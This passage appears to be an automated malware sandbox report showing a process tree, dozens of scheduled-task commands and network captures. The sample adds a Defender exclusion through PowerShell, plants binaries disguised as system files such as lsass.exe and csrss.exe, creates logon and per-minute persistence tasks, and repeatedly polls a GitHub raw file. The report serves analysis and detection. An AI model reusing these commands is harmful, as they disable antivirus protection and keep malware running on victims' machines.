        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1712
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\csrss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4764
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qqV2g7wYMJ.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4556
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:4692
      - C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2548
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\MpmmxgpAh8.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2212
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:1712
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3972
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WPmuDeaX4D.bat"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:2128
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        10⤵
        
        PID:5096
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3456
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\y17QM3q8Rw.bat"
        11⤵
        Suspicious use of WriteProcessMemory
        
        PID:2628
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        12⤵
        
        PID:4544
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1380
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Asmf6CRzTu.bat"
        13⤵
        
        PID:512
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        14⤵
        
        PID:4752
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3288
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pkopelt31u.bat"
        15⤵
        
        PID:3968
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        16⤵
        
        PID:544
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3904
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dXV640YnNf.bat"
        17⤵
        
        PID:436
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        18⤵
        
        PID:1452
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4972
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nGcIoKmMem.bat"
        19⤵
        
        PID:1084
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        20⤵
        
        PID:2380
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2248
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pkopelt31u.bat"
        21⤵
        
        PID:540
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        22⤵
        
        PID:2164
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2828
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UTkrWZWekQ.bat"
        23⤵
        
        PID:3808
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        24⤵
        
        PID:1456
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:112
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DegeIw2hse.bat"
        25⤵
        
        PID:4120
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        26⤵
        
        PID:3700
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2512
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dXV640YnNf.bat"
        27⤵
        
        PID:512
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        28⤵
        
        PID:4312
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4616
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hJP5Gj8VmP.bat"
        29⤵
        
        PID:4244
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        30⤵
        
        PID:3128
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        30⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3616
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\q3WH03M43W.bat"
        31⤵
        
        PID:1876
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        32⤵
        
        PID:5072
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        32⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3900
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CooinIVsng.bat"
        33⤵
        
        PID:3392
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        34⤵
        
        PID:4200
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        34⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3612
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BjebbrynYr.bat"
        35⤵
        
        PID:4232
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        36⤵
        
        PID:3292
        
        C:\providercommon\SppExtComObj.exe
        
        "C:\providercommon\SppExtComObj.exe"
        36⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1308

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\SIGNUP\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\SIGNUP\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\root\Licenses16\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\root\Licenses16\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\root\Licenses16\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\providercommon\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\providercommon\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\providercommon\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Windows\bcastdvr\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\bcastdvr\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Windows\bcastdvr\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\providercommon\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\providercommon\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\providercommon\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\providercommon\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\providercommon\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\providercommon\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Users\Default\My Documents\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3176

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default\My Documents\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Users\Default\My Documents\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Music\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Admin\Music\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Music\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Panther\UnattendGC\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Panther\UnattendGC\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\Panther\UnattendGC\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Videos\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\Public\Videos\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Videos\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\providercommon\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3232

Network

DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

SppExtComObj.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.111.133
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

SppExtComObj.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:09:41 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600065-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734858581.428293,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 55e96cdc76af7917525b5cbeb60762f5b482ad1e
Expires: Sun, 22 Dec 2024 09:14:41 GMT
Source-Age: 108
DNS

133.110.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.110.199.185.in-addr.arpa

IN PTR

Response

133.110.199.185.in-addr.arpa

IN PTR

cdn-185-199-110-133githubcom
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

SppExtComObj.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:09:48 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600066-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734858588.198659,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: cdb83209e9d38efb60daa5d0086c81edd4a975aa
Expires: Sun, 22 Dec 2024 09:14:48 GMT
Source-Age: 115
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

SppExtComObj.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:09:54 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600020-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734858595.831919,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: d2b1d693eadee930ec636dc9363bd7831e5712e4
Expires: Sun, 22 Dec 2024 09:14:54 GMT
Source-Age: 121
DNS

200.163.202.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.163.202.172.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

24.139.73.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.139.73.23.in-addr.arpa

IN PTR

Response

24.139.73.23.in-addr.arpa

IN PTR

a23-73-139-24deploystaticakamaitechnologiescom
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

SppExtComObj.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:10:03 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600038-LCY
X-Cache: HIT
X-Cache-Hits: 4957
X-Timer: S1734858604.622335,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: f17f942c0191af35e745e4e0b56fa7dbb269390b
Expires: Sun, 22 Dec 2024 09:15:03 GMT
Source-Age: 130
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

SppExtComObj.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:10:10 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4221-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734858611.523076,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 11bc6442486fecad7a1fb7685c16ffd21f059dd7
